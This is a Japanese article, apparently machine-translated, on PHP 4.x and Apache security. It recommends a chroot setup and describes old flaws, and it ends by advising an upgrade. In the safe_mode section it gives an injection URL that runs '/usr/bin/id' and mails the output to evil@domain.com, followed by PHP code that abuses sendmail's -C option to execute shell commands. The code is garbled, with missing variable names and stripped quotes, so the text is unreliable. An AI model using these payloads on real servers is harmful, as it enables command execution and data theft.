安全性
1. Web サーバーのセキュリティ
PHP は実際には Web サーバーのモジュール機能にすぎないため、最初に Web サーバーのセキュリティを確保する必要があります。もちろん、Web サーバーの安全性を確保するには、まずシステムのセキュリティを確保する必要がありますが、それはかなり先の話です。 PHP はさまざまな Web サーバーと組み合わせることができますが、ここでは Apache についてのみ説明します。 Apache を chroot モードでインストールして起動することを強くお勧めします。この方法では、Apache、PHP、およびそのスクリプトに脆弱性がある場合でも、影響を受けるのは制限されたシステムのみであり、実際のシステムには影響しません。ただし、chrooted Apache を使用すると、アプリケーションに特定の問題が発生します。たとえば、mysql に接続する場合、ソケット接続を実装するために localhost を使用する代わりに 127.0.0.1 アドレスを使用し、tcp 接続を使用する必要があり、効率が若干低下します。 php.ini で
[mail function]
; Win32 のみ
sendmail_from = me@localhost.com であるため、メールを送信するための関数にも問題があります。 Win32 プラットフォームの場合、sendmail は chroot 環境で調整する必要があります。
2. PHP 自体の問題
1. リモートオーバーフロー
PHP-4.1.2 以下のすべてのバージョンにはファイルアップロードのリモートバッファオーバーフローの脆弱性があり、攻撃プログラムは広く出回っており、その成功率は非常に高いです
2. リモートサービス拒否
PHP-4.2.0 および PHP-4.2.1 には、PHP multipart/form-data POST リクエスト処理にリモートの脆弱性がありますが、ローカルユーザーの権限を取得できない場合もあります。サービス拒否。
3. Safe_mode バイパスの脆弱性
PHP-4.2.2 以下から PHP-4.0.5 までの、safe_mode 制限実行コマンドの脆弱性をバイパスする PHP メール関数もバージョン 4.0.5 から追加されました。パラメータが追加されましたが、設計者の配慮が不十分なため、safe_mode の制限を超えてコマンドが実行される可能性があります。バージョン 4.0.5 の画期的な点は非常に簡単で、セミコロンで区切ってシェルコマンドを追加するだけです。たとえば、PHP スクリプト evil.php:
次の URL を実行します:
http://foo. com/evil .php?bar=;/usr/bin/id mail evil@domain.com
これでid実行結果がevil@domain.comに送信されます。
PHP 4.0.6から4.2.2の場合、safe_mode制限を突破するにはsendmailの-Cパラメータを実際に使用するため、システムはsendmailを使用する必要があります。次のコードは、safe_mode の制限を突破してコマンドを実行できます:
# 次の 2 つは存在してはいけない、またはその所有者がこのスクリプトの所有者と同じであることに注意してください:
$script=/tmp/script123; =/tmp/cf123;
$fd = fopen($cf, w);
fwrite($fd, OQ/tmp
Sparse=0
R$* . chr(9) . $#local $@ $1 $ : $1
Mlocal、P=/bin/sh、A=sh $script);
fclose($fd);
$fd = fopen($script, w); );
fwrite($fd, $cmd);
mail(nobody, , , -C$cf); または、上記の問題のあるバージョンを使用しているユーザーは、次のバージョンにアップグレードする必要があります。基本的なセキュリティの問題を解決するために、最新バージョンを速やかに適用してください。